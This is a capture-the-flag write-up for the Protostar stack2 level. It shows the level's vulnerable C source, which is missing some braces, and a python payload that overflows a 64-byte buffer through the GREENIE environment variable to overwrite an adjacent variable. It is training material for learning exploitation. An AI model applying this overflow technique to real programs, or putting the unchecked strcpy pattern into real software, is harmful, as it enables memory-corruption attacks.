Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);


I start off by first running the program:

$ ./stack2
stack2: please set the GREENIE environment variable


As expected, the GREENIE variable is empty.

Looking at the source code, the buffer is being filled with the environment variable GREENIE. Our goal is to update the environment variable GREENIE with our 64 byte overflow and then insert 0x0d0a0d0a.

To do this, we first start by echo'ing our payload into file:

$ python -c 'print "A" * 64 + "\x0a\x0d\x0a\x0d"' > /tmp/payload
$ cat /tmp/payload


Next, we set our GREENIE variable as the contents of /tmp/payload.

$ GREENIE=$(cat /tmp/payload)
$ echo $GREENIE

With everything in place, we run the program

$ ./stack2
you have correctly modified the variable


Thanks for reading.